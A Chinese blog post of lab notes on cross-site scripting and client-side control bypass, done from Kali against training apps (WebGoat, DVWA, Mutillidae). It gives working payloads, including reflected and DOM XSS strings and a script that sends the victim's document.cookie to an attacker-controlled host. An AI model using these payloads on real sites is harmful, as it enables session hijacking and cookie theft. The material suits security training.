vm虚拟机-kali使用跨站脚本攻击客户端

目录

1 使用浏览器绕过客户端控制

一、相关知识与技能

二、实验内容:

 2 识别跨站脚本漏洞

一、相关知识与技能

二、实验内容:

 3 利用 XSS 获取 Cookie

一、相关知识与技能

二、实验内容:

 4 利用 DOM XSS

一、相关知识与技能

二、实验内容:


使用跨站脚本攻击客户端

1 使用浏览器绕过客户端控制

一、相关知识与技能

通过检查器发现所有的按钮都是一个名称:action,它们的值是按钮被按下后要执行的操作。(这些可以通过看开发者工具中的network 选项卡看到)所以当发现SearchStaff,ViewProfile, ListStaff 这样的操作时,也许 DeleteProfile 可以达成不一样的效果。

二、实验内容:

1. 登陆 WebGoat,点击 Access ControlFlaws,转到 LAB:RoleBased Access Control→Stage 1:Bypass Business Layer Access Control。

2. 使用 tomcat 的登陆凭证(tom,tom)登陆这个表单,并用 F12 启用 firefox的开发者工具。

3. 来检查一下员工表单。

4. 转到开发者工具中的 Network 选项卡并单击 ViewProfile。

5. 单击 ListStaff 返回列表。

6. 更改为开发者工具中的 Inspector 选项卡。

7. 双击标记的值(105)将其改变为 101。

8. 再次点击 ViewProfile

9.WebGoat 给的目标是使用 tom 的账户删除 tom 的个人信息。

10.ViewProfile 按钮

11. 名称是 action,值为 ViewProfile,将其改为 DeleteProfile

12. 点击 DeleteProfile 后,即可完成目标任务。

 2 识别跨站脚本漏洞

一、相关知识与技能

XSS 漏洞发生在服务器端和客户端对输入执行弱验证或不进行验证,且输出没有正确编码的情况下。这意味着该应用程序允许引入 HTML 代码中使用的字符,并且在将它们发送到页面时,不进行任何编码(例如使用 HTML 转义<和>,以防止它们被解释为 HTML 或 Javascript 源代码)。

二、实验内容:

1. 将使用易受攻击的 Web 应用程序(DVWA)来完成这个小节。使用默认的管理凭据(admin 作为用户名和密码)登录,然后到 XSS reflected(反射 XSS)。

2. 测试漏洞的第一步是观察应用程序的正常响应。在文本框中填写一个名称字符串并且点击提交。

3. 应用程序使用的是输入的字符串。

4. 在文本框输入的任何内容都将出现在响应中。

5. 在普通输入的后面加上非常简单的脚本代码:

Bob<script>alert('xss')</script>

6.检查源代码。

 3 利用 XSS 获取 Cookie

一、相关知识与技能

XSS 此类的攻击中,必须有用户的交互才能触发漏洞,那么这种情况下由于攻击者并不知道何时用户才会点击或者触发漏洞,所以攻击者必须有一个可以时刻监听payload 是否被触发的服务器。

二、实验内容:

1.在 Kali Linux 的终端上运行以下命令来开启 HTTP 服务。

2.然后登陆 DVWA,再转到 XSS reflection 下;

3.在文本框中输入以下内容(192.168.56.10 为 Kali 主机 IP 地址):

Bob<script>

document.write('<imgsrc="http://192.168.56.10:88/'+document.cookie+'">');

</script>

4.查看终端。

 4 利用 DOM XSS

一、相关知识与技能

首先分析了程序的流程,注意到它没有连接到服务器,因此向页面添加信息,并且它反回了用户给出的值。然后分析了将数据添加到浏览器内部存储的脚本代码,并注意到这些数据可能无法验证是否合法,而且通过innerHTML 属性呈现给用户。对于输入的值,这将意味着数据被视为 HTML 代码,而不是文本。

二、实验内容:

1.在易受攻击的虚拟机 VM_1 中,转到 Mutillidae II |OWASP 2013 | XSS | DOM | HTML5 Storage。

2.这个练习会展示一个表单,用于在浏览器的本地记录中存储信息和相应的session。然后在“网络”选项卡中启用开发人员工具。

3.尝试添加一些数据,发现在开发者工具中并没有进行网络通信。

4.如果检查"AddNew"按钮,看到它在单击时调用了一个函数addItemToStorage。

5.转到 Debugger 选项卡并查找 addItemToStorage 函数。

6.尝试设置一个包含 HTML 代码的键值。

7.添加一个新条目,其中包含以下键值:

Cookbooktest <img src = X onerror  ="alert('DOM XSS')">

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值